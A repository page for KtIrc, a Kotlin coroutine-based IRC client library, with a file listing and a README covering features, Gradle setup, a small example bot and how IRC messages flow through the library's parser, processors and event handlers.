State is instead stored in the various `*State` properties of the
`IrcClient` such as `serverState` and `channelState`. Fields that
should not be exposed to users of KtIrc can be placed in these
public state objects but marked as `internal`.
All the generated events (from processors or from event handlers) are
passed to the `IrcClient`, which in turn passes them to the library
user via the delegates passed to the `onEvent` method.
=== Contributing
Contributing is welcomed and encouraged! Please try to add unit tests for new features,
and maintain a code style consistent with the existing code.
=== Licence
The code in this repository is released under the MIT licence. See the
link:LICENCE.adoc[LICENCE] file for more info.
|
__label__pos
| 0.874647 |
blockchain – Understanding the configuration of the iquidus API
I am trying to understand what values they ask me in the configuration. They are to install the block browser for Iquidus. I know how to get the Genesis block, since I have rigidly encoded it when I made a fork to create a new altcoin, however, I'm not sure how to get the genesis_tx. I know you can convert it from the Genesis block but I'm not sure how.
"genesis": {
"genesis_tx": "",
"genesis_block": ""}
As for the configuration of the API, they request an address, blocking index, blockhash and txhash. The blocking index can be any value within the height of your block … so I choose any value for the index with the corresponding address in the transaction list? Also, how do I get the txhash and the blockhash? In my opinion, these values are subject to change and I know they are stored in the chain of blocks … Does anyone know how I can retrieve this information?
"api": {
"blockindex": "",
"blockhash": "",
"txhash": "",
"address": ""
}
I appreciate your time and consideration.
|
__label__pos
| 0.919444 |
View Light
What is a monad?
IMO these things are best understood through the lens of Haskell's `Maybe` type.
Very simply, a `Maybe Int` for example can be either `Just 5` or `Nothing`. At its most basic form, it can be used with pattern matching. For example here's a haskell function that adds 2 to a Maybe if it's there:
add2 :: Maybe Int -> Maybe Int
add2 (Just n) = Just (n + 2)
add2 Nothing = Nothing
You can see we had to use pattern matching to "unwrap" the actual value of the maybe so we could add 2 to it. This is pretty inconvenient and pretty annoying especially if you're trying to do something more complex than simply adding 2. That's where `Functor` comes in.
`Functor` allows you to apply a function to the value inside the functor and get back the modified functor by using the `fmap` function. Here's what that definition looks like:
fmap :: Functor f => (a -> b) -> f a -> f b
This definition is a bit complex so I'll break it down. This is saying "fmap is a function which is defined for any `Functor` `f`. This function accepts a different function from `a` to `b`; and a functor containing an `a`; and returns a functor containing a `b`." `a` and `b` can be any type. What makes something a functor at the very base level is whether or not this function is defined. You can think about it like mapping over a list in any other language because that's exactly what `fmap` is defined as for lists.
So in our `Maybe` example, we can use it like so:
add2 :: Maybe Int -> Maybe Int
add2 x = fmap (+ 2) x
-- or
add2 x = (+ 2) <$> x -- <$> is just an infix version of fmap; same exact function.
Much more convenient, and as an added bonus it looks a bit more like regular function application (in haskell anyway).
We're not quite to monads yet because there's a step between `Functor` and `Monad` and that's called `Applicative`. Instead of starting with the (somewhat confusing) definition, let me pose a question: what if I have a function with more than one argument that I want to pass `Maybe`s into? Like what if I wanted to add two `Maybe` values together? That's the problem applicative solves.
With functors we can do:
(+ 2) <$> x
But with an applicative instance we can do:
(+) <$> maybeA <*> maybeB
the result of which will be a `Maybe` containing the result of adding the two values inside. If either of the `Maybe` values are `Nothing` it will come out as `Nothing`. And this pattern is extendable for more than just two arguments as well. For example:
functionWithManyNonMaybeArguments <$> maybeA <*> maybeB <*> maybeC <*> maybeD
So to quickly summarize: functors allow you to apply a function to the inside of one "wrapped" value (like `Maybe`). Applicatives allow you to apply a function of many arguments to many "wrapped" values. Now, here's where we get to monads. Here's a situation you might be in:
someFn :: a -> Maybe c
someMaybe :: Maybe a
How would you feed that `someMaybe` value into the `someFn` function? You might guess to use `fmap` from functor, but let's look at what would happen:
fmap someFn someMaybe
fmap :: Functor f => (a -> b) -> f a -> f b
-- so in this case
fmap :: Functor Maybe => (a -> Maybe c) -> Maybe a -> Maybe (Maybe c)
-- so
fmap someFn someMaybe :: Maybe (Maybe c)
Oof, double-wrapped `Maybe`; That's not right. This is the problem `Monad` solves with the `bind` function or `>>=` operator. The correct code for this would be:
bind :: Monad m => m a -> (a -> m b) -> m b -- again, >>= is just an infix version of bind; exact same thing.
someMaybe >>= someFn :: Maybe c
Also worth noting that for something to be a `Monad` it must also be `Applicative` and for something to be `Applicative` it must also be a `Functor`. So all monads are also applicatives and functors.
Sorry if you don't know any Haskell because this is pretty complex and very haskell-focused, but I kinda figured you wouldn't be asking these questions without a passing familiarity with some haskell. Feel free to ask any questions; I love talking about this stuff!
Rating: (You must be logged in to vote)
Reply
|
__label__pos
| 0.996899 |
Site icon Trend Bizz
Is Kisskh.me Down? Understanding Access Issues and Solutions
Is Kisskh.me Down
In the digital age, where online platforms serve as critical gateways to entertainment, information, and social interaction, encountering downtime can be particularly frustrating. This is especially true for users of Kisskh.me, a platform that has carved out its niche among internet users. If you’ve found yourself asking, Is Kisskh.me down? you’re not alone. This article delves into the potential reasons behind Kisskh.me’s accessibility issues and provides actionable solutions to help you navigate these digital hiccups.
Is Kisskh.me Down?
The first question that comes to mind when encountering difficulties accessing Is Kisskh.me down is whether the site is down altogether. Several factors could contribute to this, including server issues, maintenance, or domain-related problems.
To check if Kisskh.me is down, users can employ various online tools designed for this purpose, such as DownDetector or IsItDownRightNow. These platforms provide real-time information on the status of websites, helping users determine if the problem lies with Is Kisskh.me down itself or their own Internet connection.
Common Causes of Downtime
Several factors can contribute to Is Kisskh.me down needing to be more inaccessible sometimes. These range from server-related issues, such as maintenance or unexpected technical problems, to network connectivity issues on the user’s end. Additionally, domain problems, coding errors, and cyber threats like DDoS attacks can all lead to the site being down. Understanding the root cause is the first step in resolving the issue and restoring access to the site.
Troubleshooting Access Issues
When faced with downtime, there are several troubleshooting steps users can take. First, verify if the issue is isolated to Is Kisskh.me down by checking other websites. If they’re accessible, the problem likely lies with Kisskh and me. Refreshing the page, clearing your browser’s cache, and changing DNS settings are basic steps that can resolve many access issues. For more persistent problems, using a VPN might help, mainly if the site is regionally restricted or if your network is experiencing connectivity issues.
Preventative Measures and Solutions
To minimize future disruptions, staying informed about planned maintenance and updates via Is Kisskh.me down social media channels can be beneficial. Employing regular cybersecurity practices, such as updating software and using robust antivirus solutions, can also protect against cyber threats that might cause downtime. Moreover, regular backups and employing alternative access points, like mobile data instead of Wi-Fi, can help ensure continuous access despite network issues.
Understanding Access Issues:
Even if Is Kisskh.me down is down partially, users may still encounter access issues preventing them from using the site effectively. These issues can range from slow loading times to error messages or even being unable to reach the site altogether.
Some common access issues users may face include:
FAQs
Q: How can I check if Kisskh.me is down?
A: Utilize down detector services online or try accessing the site from different devices and networks to determine if the issue is widespread or localized.
Q: What should I do if Kisskh.me down is not loading only for me?
A: Check your internet connection, clear your browser cache, or switch to a different browser. If the problem persists, consider using a VPN.
Q: Can network issues on my end be causing Kisskh.me to be inaccessible?
A: Yes, issues like weak Wi-Fi signals, ISP restrictions, or outdated DNS settings can affect your ability to access Kisskh.me.
Q: What are the best practices to avoid future downtime with Kisskh.me?
A: Follow Kisskh.me on social media for updates, use reliable DNS servers, and ensure your internet connection is stable.
Understanding the complexities behind website downtime and implementing the suggested solutions can significantly enhance your online experience, ensuring that disruptions are swiftly resolved. Remember, the digital world is dynamic, and staying informed and prepared is critical to navigating its challenges.
Exit mobile version
|
__label__pos
| 0.996913 |
Click here to monitor SSC
SQLServerCentral is supported by Red Gate Software Ltd.
Log in :: Register :: Not logged in
Locking, Blocking and Deadlocking
By Wayne Sheffield,
I wish that I had a dollar for every time someone came to me, all excited and worried, telling me “We’ve got locking going on in this SQL Server instance”. My usual response is “Yep, we sure do. Isn’t it great?!” In this article, we’ll discuss locking in SQL Server, why it’s good, and what happens when it gets out of control.
Locking is a mechanism built in to SQL Server in order to ensure transactional integrity and database consistency between concurrent transactions. It prevents transactions from reading data that has yet to be committed from other transactions, and it also prevents multiple transactions from attempting to modify the same data at the same time. A transaction will place locks on various resources that it is dependent upon, so that other transactions cannot change the resource in a way that would be incompatible with what this transaction is doing. The transaction is responsible for clearing the lock when the transaction no longer needs it.
Since locking is closely coupled with transactions, let’s take a quick look at what transactions do. Think of a transaction as a logical unit of work. This can be as simple as performing an operation on a single row in a single table – or it could be performing an operation on multiple rows, possibly in multiple tables. Perhaps the transaction is inserting a new employee into the employee table. Or inserting a complex sales order, with a summary and line item details, and there are triggers that fire off manufacturing orders for various parts.
Each logical unit of work has four properties that it must do; collectively these are referred to as the ACID properties. They are:
• Atomicity – the transaction must be atomic: either all of its actions are performed, or none of them. You cannot have it do some, but not the other.
• Consistency – when the transaction is completed, all of the data must be in a consistent state. All rules must be applied, and all internal structures must be correct at the end of the transaction.
• Isolation – modifications made by concurrent transactions must be isolated from all other concurrent transactions. The data seen by a transaction will be either the data seen before other transactions have made modifications, or after the other transactions have completed, but not any intermediate state. (If a second transaction is modifying two rows, the first transaction cannot see a change to the first row and the original state of the second row.)
• Durability – when completed, the changes made by a transaction are permanently stored in the system, and they will persist even in the event of a system failure. At a minimum, this requires that the changes made by the transaction to have been written out to disk in the transaction log file.
Let’s take a quick look at Atomicity in action. The following example inserts three rows into a table:
DECLARE @TransactionTest TABLE (
ID INT PRIMARY KEY,
SomeCol VARCHAR(20)
);
INSERT INTO @TransactionTest (ID, SomeCol) VALUES (0,'Row1');
INSERT INTO @TransactionTest (ID, SomeCol) VALUES (1,'Row2');
INSERT INTO @TransactionTest (ID, SomeCol) VALUES (1,'Row3');
SELECT * FROM @TransactionTest;
In this example, each row being inserted is being performed by a separate statement, so each is a separate transaction (assuming the default SSMS settings for implicit transactions). Since a transaction was not specified, each statement is an implicit transaction. The third insert produces a primary key violation (which would leave the database with inconsistent data), so that statement fails. When the table is queried, it can be seen that the first two rows have been inserted.
However, if this data were to be inserted as one statement:
DECLARE @TransactionTest TABLE (
ID INT PRIMARY KEY,
SomeCol VARCHAR(20)
);
INSERT INTO @TransactionTest (ID, SomeCol)
VALUES
(0,'Row1'),
(1,'Row2'),
(1,'Row3');
SELECT * FROM @TransactionTest;
In this example, all three rows are being inserted in a single statement. The primary key violation still occurs, so the statement fails. When the table is queried, it can be seen that none of the records have been inserted – the transaction failed, and atomicity requires that none of its actions be performed, so the first two rows have been undone. In SQL Server, this is called a rollback – the actions that this transaction has performed are rolled back to their original state.
As a transaction runs, it will place various locks on various resources in order to accomplish its task. Unfortunately, it’s not as simple as just placing a lock on a single row, making the change to that row, and removing the lock. If multiple locks are being placed on a page, a lock at the page level may be issued instead. Locks may be placed on multiple rows, either on the same page or multiple pages. Each lock is necessary to protect a resource, however each lock requires memory. If too many locks are being placed, a strain can be put upon the memory in the system.
To alleviate this, the system has a Lock Escalation mechanism, where locks can be placed on a higher level resource to protect everything underneath it. When lock escalation kicks in, the rows or pages that are being locked will be escalated to a table lock (if this is a partitioned table, and if configured to do so, this can go to the partition level before the table level). Note that rows or pages are escalated to table level locks – row locks are never escalated to page level locks.
When the higher level lock is placed, the lower level locks are then released to ease the memory pressure.
As you can see, locking in SQL Server is a normal event, and it is essential to ensure that the data in the database is consistent.
There are various lock modes that a transaction can use to protect itself. Some of these lock modes are compatible with other lock modes, and others are incompatible with each other. When one transaction is running that has locks on resources, and another transaction comes along trying to place incompatible locks on the same resources, then the second transaction has to wait until the first transaction is complete before it can proceed – the first transaction is blocking the second transaction from running.
Considering all that locks do, it is easy to understand that blocking itself is a natural event within SQL Server. If the transactions are short, the blocking may never even be noticed. However, if there is a long-running transaction, then the blocking may really be noticed. If the operations are on a busy table, the application may itself seem to be unresponsive while it waits for queries to return – queries that are being blocked by this long-running transaction.
There may also be blocking issues if there is a hot spot in the database. One well known hot spot is the allocation pages within the tempdb database. If queries use a lot of temporary tables / table variables or spill out of memory, then these pages which track the allocations of these temporary objects will become a hot spot of activity, and as the objects are created, the allocation pages have short-term locks placed on them. If you happen to have a lot of this going on, then this can start blocking other transactions from creating their temporary objects, slowing transactions down.
Faster hardware doesn’t solve the blocking problem – it just shortens the time that the locks are being held. Frequently, the queries involved will need to be optimized (recoded to support optimal retrieval, possibly adding / modifying indexes) for optimal performance. If blocking is caused by a hot spot, a database redesign may even be in order.
The worse kind of blocking is a deadlock. A deadlock occurs when one transaction has a lock on one resource, and another transaction has a lock on a second resource. Each transaction then attempts to acquire a lock on the resource that the other transaction has locked. (It is also possible for there to be a chain of transactions involved, where transaction 1 needs the resource locked by transaction 2, which needs the resource locked by transaction 3, which needs the resource locked by transaction 1.)
When this happens, both transactions will wait forever for the other transaction to finish – they are both dead, waiting for locks to clear. Since they are waiting on each other, they will never clear. SQL Server has a mechanism for detecting deadlocks, and this mechanism will select one of the transactions to be terminated and rolled back. The transaction chosen to be the deadlock victim is dependent upon the deadlock priority of the transactions, and the amount of work necessary be rolled back. If the transactions are running with the same deadlock priority, the transaction with the least amount of work to be rolled back will be chosen as the deadlock victim; if the deadlock priorities are different, the transaction with the lowest deadlock priority will be chosen as the deadlock victim.
Let’s engineer a deadlock and watch how it works in action. In SSMS, open up two query windows. In the first window, run the following code to create a global temporary table and two put two rows into this table. The code then starts an explicit transaction, and updates one of the rows:
-- Create a global temp table and put two rows into it
CREATE TABLE ##DeadlockTest (Col1 INT CONSTRAINT PK PRIMARY KEY);
INSERT INTO ##DeadlockTest ( Col1 )
VALUES (5),
(15);
GO
BEGIN TRANSACTION;
UPDATE ##DeadlockTest
SET Col1 = Col1 + 10000
WHERE Col1 = 5;
Now go to the second query window, and enter and run the following code:
BEGIN TRANSACTION;
UPDATE ##DeadlockTest
SET Col1 = Col1 + 10000
WHERE Col1 = 15;
UPDATE ##DeadlockTest
SET Col1 = Col1 + 10000
WHERE Col1 = 5;
Notice that the query does not complete – The second update statement is being blocked by the update statement that was run in the first query window. Now, return to the first window, and enter and run just the following code:
UPDATE ##DeadlockTest
SET Col1 = Col1 + 10000
WHERE Col1 = 15;
At this point, you have created a deadlock. In the first query window, there is a lock on the table on the row where Col1 = 5. The second query window has a lock on the row where Col1=15. The second query window is attempting to place a lock on the row where Col1 = 5, and the first query window is attempting to place a lock on the row where Col1 = 15. If nothing were to intervene, both of these transactions would sit here forever, waiting for the resource that it needs to be cleared. Fortunately, SQL Server detects this deadlock condition, and selects one of the transactions to be the deadlock victim, terminating that statement and rolling back the changes that it has made.
We still need to clean up, so in the query window that was not selected as the victim, run:
ROLLBACK TRANSACTION;
And in the first query window, run the following statement to drop the table:
DROP TABLE ##DeadlockTest;
Summary
In summary, we have a natural progression of events going on during a transaction. The transaction places locks on the various resources it needs to protect the referential integrity and database consistency. These locks will block other transactions from acquiring locks on the same resources until the transaction with the lock clears the lock (by either completing or being rolled back). These actions (locking and blocking) are completely normal events within SQL Server, and are to be expected.
However, if you have a long running transaction, this can create long-term blocking in the database, preventing other work from going on. And if two different transactions enter into a deadlock situation, SQL Server will terminate one of the transactions so that the system is not locked up. Neither of these situations is desirable, and changes will be necessary in order to prevent these from happening again.
And now you can see why it’s so great that there is locking going on in SQL Server.
Reference
http://technet.microsoft.com/en-us/library/jj856598.aspx (SQL Server Transaction Locking and Row Versioning Guide)
Total article views: 6236 | Views in the last 30 days: 679
Related Articles
FORUM
Transaction (Process ID 59) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction
Transaction (Process ID 59) was deadlocked on lock resources with another process and has been chose...
FORUM
deadlock
deadlock
FORUM
deadlock
deadlock
FORUM
Transaction (Process ID 107) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction.
Transaction (Process ID 107) was deadlocked on lock resources with another process and has been chos...
FORUM
Transaction deadlock error
Transaction deadlock error while executing two different DDL
Tags
blocking
deadlocking
locking
Contribute
Join the most active online SQL Server Community
SQL knowledge, delivered daily, free:
Email address:
You make SSC a better place
As a member of SQLServerCentral, you get free access to loads of fresh content: thousands of articles and SQL scripts, a library of free eBooks, a weekly database news roundup, a great Q & A platform… And it’s our huge, buzzing community of SQL Server Professionals that makes it such a success.
Join us!
Steve Jones
Editor, SQLServerCentral.com
Already a member? Jump in:
Email address: Password: Remember me: Forgotten your password?
Steve Jones
|
__label__pos
| 0.71749 |
VnutZ Domain
Copyright © 1996 - 2018 [Matthew Vea] - All Rights Reserved
1997-04-27
Featured Article
Programmatically Adjusting the RAM Refresh Rate
[index] [930 page views]
I recently found this old gem I wrote back in high school while digging through and purging garbage from the old "My Documents" folder. As I alluded to in my "Reflecting on a Quarter Century Online," there was a book I stumbled across in the library that opened a new door on programming for me that revealed how a Pascal programmer (high school remember?) could access a PC's underlying hardware. Between that and some articles I found on the Internet, I reprogrammed the PIT chip on my old 386SX to get a performance boost!
MEM-RATE v1.11 allows you to adjust the setting of your 8253 PIT timer 1. DRAM chips relied on capacitors to keep a charge present and needed a periodic refresh in order to prevent data corruption. The Programmable Interval Timer Channel 1 drove the refresh logic to the memory chips. Setting the refresh rate too low can cause the capacitors to discharge resulting in the chips to losing their memory, which in turn induces an NMI MEMORY PARITY ERROR and crashing the machine. Most computers require at least a 5Khz refresh rate to maintain system integrity. (NOTE: This function became moot on modern hardware where the refresh was handled natively out-of-band.)
The advantage to adjusting your computer's refresh rate is improved system performance. The PIT interrupts the CPU in order to conduct the memory refresh. Therefore, the less your CPU is interrupted by the PIT, the more cycles are available for actual processing. The disadvantage to reducing the refresh rate arises in memory failure (only at LOW levels) and reduced hard disk performance. The HD's timers are intimately linked with this interrupt for motor timing. Although new rates will not affect HD data, it will slow down your access.
It is advised to obtain a total system benchmark utility and experiment with different refresh rates until you obtain the optimal performance balanced by DRAM stability and hard drive needs. Most standard BIOS systems default the PIT timer 0 to 66Khz. I was able to boost my 386 performance by 7% lowering the memory refresh to 25Khz with negligible HD speed loss.
Program MEM_Rate (Input, Output);
{ MEM-Rate v1.11
Copyright (c) 1997 Matthew Vea
All Rights Reserved
Adjusts the memory refresh timer for improved system performance. }
{$G+} {80286 Instructions Enabled}
Const
Max = 1193180; { Maximum Rate }
Var
Rate : LongInt; { Memory Refresh Rate }
Code : Integer; { Scratch Variable }
Begin
Writeln;
Writeln ('Memory Refresh Control v1.10');
Writeln ('Copyright (c) 1997 Matthew Vea');
Writeln;
If ParamCount < 1 Then
Writeln ('ERROR : Refresh Rate Not Specified')
Else
Begin
Val (ParamStr (1), Rate, Code);
Port [$43] := $76;
Port [$41] := Lo (Max DIV Rate);
Port [$41] := Hi (Max DIV Rate);
Writeln ('New Refresh Rate = ', Rate / 1000 :1:2, 'Khz');
End;
Writeln;
End.
The code above takes a user defined refresh rate as a command line parameter.
The next step is to configure the PIT directly via the Command/Mode port 0x43 and the Channel 1 data port 0x41. A value of 0x76 (01110110) is written into the command port. 01 is written to bits 7 and 6 to designate Channel 1. 11 is written to bits 5 and 4 to designate both hi and lo bytes will be written to the data port. 011 for bits 3, 2, and 1 are just a default instructing the PIT to use the Square Wave generator. Finally, 0 is written to bit 0 configuring the chip to treat data as 16bit binary instead of BCD.
After writing to the Command/Mode port, the new frequency can be programmed into the Channel 1 data port. I/O ports only allow 8 data bits and therefore 16 bits must be written sequentially as the low byte followed by the high byte. To program a frequency, the maximum clock rate 1193180 gets divided by the desired frequency and each portion of that 16 bit result gets written to the 0x41 data port. The number 1193180 comes from the native clock frequency at 1.19MHz (1193180Hz). Immediately upon writing the high byte to the data port, the configuration will take effect.
More site content that might interest you:
"Homeopathic" - you keep using that word, I do not think it means what you think it means.
Try your hand at fate and use the site's continuously updating statistical analysis of the MegaMillions and PowerBall lotteries to choose "smarter" number. Remember, you don't have to win the jackpot to win money from the lottery!
Tired of social media sites mining all your data? Try a private, auto-deleting message bulletin board.
|
__label__pos
| 0.600001 |
What is the average speed of USB 2.0 drive (thumb)?
I tested one and this is the result,
avg read 15mb/s
avg write 5mb/s
Is that good speed?
7 Answers
Relevance
• 9 years ago
Favourite answer
USB 2.0 has a maximum speed of 60 MB/s. USB 2.0 flash drives on the market are able to reach read and write speeds of up to 34 and 28MB/s respectively. That being the maximum, I would say your speed is probably a little low, but not terribly. Actual speeds are also largely dependent on the USB controller of your motherboard and how many USB devices are simultaneously plugged in.
• Anonymous
9 years ago
That's the average for the USB 2.0, if you want to increase speed get a 3.0 port, and btw Teracopy can increase your read/write speed by at least 150%
Source(s): IT Technician, personally uses Teracopy for large amounts of data.
• Anonymous
5 years ago
This Site Might Help You.
RE:
What is the average speed of USB 2.0 drive (thumb)?
I tested one and this is the result,
avg read 15mb/s
avg write 5mb/s
Is that good speed?
Source(s): average speed usb 2 0 drive thumb: https://biturl.im/sM8q9
• Anonymous
9 years ago
The maximum theoretical speed of usb 2.0 is 60mb/s, actual speed though differs due to hardware limitations etc. but you should still be able to achieve a max 40mb/s. 5 mb/s seems rather slow in comparison.
• What do you think of the answers? You can sign in to give your opinion on the answer.
• 9 years ago
I would say its fine. It doesn't really matter unless you are constantly pulling data off of of your drive and putting things on it everyday especially big files such as video files if you are a film editor. If you are going to be doing big constant work you should purchase an external hard drive all together.
• Anonymous
9 years ago
Yup it seems like ok.
• 9 years ago
0mph
Still have questions? Get answers by asking now.
|
__label__pos
| 0.737552 |
webbhorn webbhorn - 3 months ago 19
Linux Question
Why aren't glibc's function addresses randomized when ASLR is enabled?
In trying to understand ASLR, I built this simple program:
#include <stdio.h>
#include <stdlib.h>
int main() {
printf("%p\n", &system);
return 0;
}
ALSR seems to be enabled:
$ cat /proc/sys/kernel/randomize_va_space
2
and I used GCC to compile the program:
$ gcc aslrtest.c
Every time I run this program, it prints the same address (
0x400450
).
I would expect this program to print a different address each time if glibc is loaded at a random address. This is surprising to me, especially given that preventing return-to-libc attacks is supposed to be a primary motivation for ASLR (in particular the
system()
call).
Am I wrong in expecting that the address of
system()
should be randomized? Or is there likely something wrong with my configuration?
R.. R..
Answer
Any references to a function from a shared library that's made from a non-position-independent object file in the main program requires a PLT entry through which the caller can make the call via a call instruction that's resolved to a fixed address at link-time. This is because the object file was not built with special code (PIC) to enable it to support calling a function at a variable address.
Whenever such a PLT entry is used for a function in a library, the address of this PLT entry, not the original address of the function, becomes its "official" address (as in your example where you printed the address of system). This is necessary because the address of a function must be seen the same way from all parts of a C program; it's not permitted by the language for the address of system to vary based on which part of the program is looking at it, as this would break the rule that two pointers to the same function compare as equal.
If you really want to get the benefits of ASLR against attacks that call a function using a known fixed address, you need to build the main program as PIE.
|
__label__pos
| 0.889451 |
Forum > Databases
BufDataset foCaseInsensitive not working with "ñ" "Ñ"
(1/1)
lainz:
"Tempo" is the TEdit text.
The filter works fine for any text, except these special characters.
--- Code: Pascal [+][-]window.onload = function(){var x1 = document.getElementById("main_content_section"); if (x1) { var x = document.getElementsByClassName("geshi");for (var i = 0; i < x.length; i++) { x[i].style.maxHeight='none'; x[i].style.height = Math.min(x[i].clientHeight+15,306)+'px'; x[i].style.resize = "vertical";}};} ---Productos.Filtered := False; Productos.FilterOptions := [foCaseInsensitive]; //Productos.Filter := ‘(sNombre = ’ + QuotedStr(‘*’ + Tempo + ‘*’) // + ' OR sCodProducto = ' + QuotedStr(Tempo) // + ' OR sEan = ' + QuotedStr(Tempo) // + ' OR sEan2 = ' + QuotedStr(Tempo)+‘) ’ // + ' AND bActivo <> ' + QuotedStr(‘F’); Productos.Filter := ArmarFiltroProductos(Tempo); // the same as the commented lines above Productos.Filter := Productos.Filter + ' AND sTipoProducto <> ' + QuotedStr(‘I’); Productos.Filtered := True;
The lowercase of Ñ is ñ, but setting foCaseInsensitive has no effect.
If I type Ñ only uppercase elements of the DB are returned in the DBGrid. Like "Ñandú" but not "Cañón".
If I type ñ only lowercase elements of the DB are returned in the DBGrid. Like "Cañón" but not "Ñandú".
The DB has mixed content, some are upper case and some are lower case.
In BufDataset.pas I found this
--- Code: Pascal [+][-]window.onload = function(){var x1 = document.getElementById("main_content_section"); if (x1) { var x = document.getElementsByClassName("geshi");for (var i = 0; i < x.length; i++) { x[i].style.maxHeight='none'; x[i].style.height = Math.min(x[i].clientHeight+15,306)+'px'; x[i].style.resize = "vertical";}};} ---function DBCompareText(subValue, aValue: pointer; size: integer; options: TLocateOptions): LargeInt; begin if [loCaseInsensitive,loPartialKey]=options then Result := AnsiStrLIComp(pchar(subValue),pchar(aValue),length(pchar(subValue))) else if [loPartialKey] = options then Result := AnsiStrLComp(pchar(subValue),pchar(aValue),length(pchar(subValue))) else if [loCaseInsensitive] = options then Result := AnsiCompareText(pchar(subValue),pchar(aValue)) else Result := AnsiCompareStr(pchar(subValue),pchar(aValue));end;
Anyways, the ñ and Ñ are in the ASCII table
http://ascii-table.com/ansi-codes.php
209 D1 U+00D1 Ñ Latin Capital Letter N With Tilde
241 F1 U+00F1 ñ Latin Small Letter N With Tilde
Any ideas on how to fix? I'm on Windows but the project works also on Linux and macOS.
lainz:
Attached a simple test project that replicates the Issue, I'm reporting it at the bugtracker too.
How to test:
- Click on the first button, and see the filtered records (it displays only 1 record, must display 2)
- Click on the second button, and see the filtered records (it displays only 1 record, must display 2)
Edit: Reported here
https://bugs.freepascal.org/view.php?id=36512
amartitegui:
Hello
No news on this right?
LacaK:
IMO problem is in AnsiCompareText function. On Windows this functions calls Win API function CompareStringA(), which "Compares two character strings, for a locale specified by identifier" - so SompareStringA(LOCALE_USER_DEFAULT, NORM_IGNORECASE, ...) is called.
And there is remark "If your application is calling the ANSI version of CompareString, the function converts parameters via the default code page of the supplied locale. Thus, an application can never use CompareString to handle UTF-8 text."
But in Lazarus string are by default UTF-8 encoded so probably you supply UTF-8 strings to AnsiCompareText function, which will not work ...
In my experiments on Windows (ansi code page 1250):
- CompareStringA(LOCALE_USER_DEFAULT, NORM_IGNORECASE, 'ábc',3,'ÁBC',3)-2 == 0 ... OK
- CompareStringA(LOCALE_USER_DEFAULT, NORM_IGNORECASE, 'ábc',3,'ABC',3)-2 <> 0 ... OK
- CompareStringA(LOCALE_USER_DEFAULT, NORM_IGNORECASE+LINGUISTIC_IGNOREDIACRITIC, 'ábc',3,'ABC',3)-2 == 0 ... OK
Thaddy:
As per msdn, CompareStrEx should be called for UTF8/16. It looks like it has no impact except for windows versions before Vista.
See the advice here:
https://learn.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-comparestringa
So this indeed is a bug and needs to be corrected.
Also note that even CompareStrEx has some security considerations as announced as per:
https://learn.microsoft.com/en-us/windows/win32/intl/security-considerations--international-features
Navigation
[0] Message Index
Go to full version
|
__label__pos
| 0.605962 |
2014 Latest Microsoft 70-416 Exam Dumps Free Download(71-80)!
QUESTION 71
Your network contains a Virtual Desktop Infrastructure (VDI). All users access applications by using their virtual desktop. All virtual desktops run Windows 8. You have a test environment that contains four computers. The computers are configured as shown in the following table.
clip_image001
You plan to sequence 15 applications that will be deployed to the virtual desktops. You need to identify which computers must be used to run the App-V Sequencer. Which computer should you identify? More than one answer choice may achieve the goal. Select the BEST answer.
A. Server1
B. Client1
C. Server2
D. Client2
Answer: D
QUESTION 72
Your network contains an Active Directory domain named contoso.com. The domain contains five servers. The servers are configured as shown in the following table.
clip_image001[4]
Servers Microsoft Application Virtualization (App-V) management server You plan to deploy three App-V applications named App1, App2, and App3 by using RemoteApp publishing. Users will access App1, App2, and App3 from the RD Web Access site. You need to ensure that the users can run App1, App2, and App3 by clicking links to the applications from the RD Web Access site. On which server should you install the App-V client?
A. Server1
B. Server2
C. Server3
D. Server4
E. Server5
Answer: A
QUESTION 73
Your network contains an Active Directory domain named contoso.com. You deploy Remote Desktop Services (RDS) and publish multiple RemoteApp programs. You need to ensure that users can subscribe to the RemoteApp and Desktop Connections feed by using their email address. Which resource record type should you add to the DNS zone? To answer, select the appropriate resource record type in the answer area.
clip_image001[6]
Answer:
clip_image001[8]
QUESTION 74
Your network contains an Active Directory domain named contoso.com. Your company plans to deploy a Remote Desktop Services (RDS) infrastructure that will contain six Remote Desktop Session Host (RD Session Host) servers and three applications. The servers will be configured as shown in the following table.
clip_image001[10]
You need to identify how many session collections will be required to publish the applications on the RD Session Host servers. How many session collections should you identify?
A. 1
B. 2
C. 3
D. 4
Answer: D
QUESTION 75
Your network contains an Active Directory domain named contoso.com. You deploy Remote Desktop Services (RDS) to four servers. The servers are configured as shown in the following table.
clip_image001[12]
You create a session collection named Collection1 that contains Server1 and Server2. Collection1 will use user profile disks stored in a share named Share1. Two users named User1 and User2 are members of a group named Group2. User1 and User2 will use RDS. You need to identify which security principal must have full permissions to Share1. Which security principal should you identify? To answer, select the appropriate object in the answer area.
clip_image001[14]
Answer:
clip_image001[16]
QUESTION 76
Your network contains an Active Directory domain named contoso.com. The domain has Remote Desktop Services (RDS) deployed. A technician publishes 10 line-of-business applications and 10 productivity applications as RemoteApp programs. You need to ensure that the RemoteApp programs are organized in two separate categories on the Remote Desktop Web Access (RD Web Access) site. What should you modify?
A. The Web.config file of the RD Web Access site
B. The Directory Browsing settings of the RD Web Access site
C. The list of RemoteApp program folders in the properties of the RemoteApp programs
D. The User Assignment settings of the RemoteApp programs
Answer: C
QUESTION 77
Your company has a main office and 10 branch offices. Each branch office connects to the main office by using a low-bandwidth WAN link. All servers run Windows Server 2012. All client computers run Windows 8. You plan to deploy 20 new line-of-business applications to all of the client computers. You purchase 5,000 client licenses for the line-of-business applications. You need to recommend an application distribution solution. The solution must be able to meet the following requirements:
– Download application installation files from a server in the local site.
– Generate reports that contain information about the installed applications.
– Generate administrative alerts when the number of installed applications exceeds the number of purchased licenses.
What should you include in the recommendation?
More than one answer choice may achieve the goal. Select the BEST answer.
A. Applications published as RemoteApp programs
B. Assigned applications by using Group Policy objects (GPOs)
C. Applications deployed by using Microsoft System Center 2012 Configuration Manager
D. Published applications by using Microsoft Application Virtualization (App-V) publishing servers
Answer: C
QUESTION 78
Your company has a main office and two branch offices. The branch offices connect to the main office by using a slow WAN link. You plan to deploy applications to all of the offices by using Microsoft Application Visualization (App-V) 5.0 streaming. You need to recommend the server placement for the planned infrastructure. What should you recommend? More than one answer choice may achieve the goal. Select the BEST answer.
A. In the main office, deploy a management server, a database server, and a publishing server.
In the branch offices, deploy a publishing server.
B. In the main office, deploy a database server and a publishing server.
In the branch offices, deploy a management server, a database server, and a publishing server.
C. In the main office, deploy a management server, a database server, and a publishing server.
In the branch offices, deploy a database server.
